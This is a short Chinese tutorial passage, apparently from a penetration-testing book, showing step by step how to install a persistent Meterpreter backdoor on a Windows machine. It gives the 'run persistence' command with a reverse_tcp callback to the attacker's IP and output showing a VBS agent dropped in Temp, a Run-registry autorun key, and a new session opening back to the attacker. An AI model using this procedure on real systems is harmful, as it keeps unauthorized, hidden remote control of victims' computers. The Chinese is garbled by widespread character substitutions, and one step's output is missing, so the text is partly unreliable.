meterpreter 持久后门

建立持久后门

当成功获取目标系统的访问权限后，须要寻找方法来恢复与目标主机的链接，而无需再进入目标系统。若是目标用户破坏了该链接，例如从新启动计算机，此时使用后门将容许自动从新与目标系统创建链接。为了后续渗透方便，因此须要建立一个后门。这样，即便链接被中断，也不会影响工做。下面将介绍建立持久后门。建立持久后门的具体操做步骤以下所示。

（1）激活Meterpreter会话。执行命令以下所示：

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…
meterpreter >

（2）建立持久后门以前，先查看下它的帮助文件。执行命令以下所示：

以上信息显示了持久后门的一些选项。使用不一样的选项，来设置后门。

（3）建立一个持久后门。执行命令以下所示：

meterpreter > run persistence -U -A -i 10 - 8090 -r 192.168.41.234
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/
AA-886OKJM26FSW_20140507.2857/AA-886OKJM26FSW_20140507.2857.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.41.234 LPORT=4444
[*] Persistent agent script is 148405 bytes long
[+] Persistent Script written to C:\DOCUME~1\Test\LOCALS~1\Temp\IzXBdJvcpnD.vbs
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script C:\DOCUME~1\Test\LOCALS~1\Temp\IzXBdJvcpnD.vbs
[+] Agent executed with PID 1612
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\
CurrentVersion\Run\mERugsIe
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\
CurrentVersion\Run\mERugsIe

输出的信息显示了建立后门的一个过程。在以上信息中能够看到，在目标系统中建立了一个持久脚本，保存在C:\DOCUME~1\Test\LOCALS~1\Temp\IzXBdJvcpnD.vbs。而且，该脚本会自动在目标主机上运行，此时将会创建第二个Meterpreter会话。以下所示：

meterpreter > [*] Meterpreter session 2 opened (192.168.41.234:443 -> 192.168.41.146:1032) at 2014-05-07 16:25:47 +0800

看到以上的输出信息，表示该持久后门已建立成功。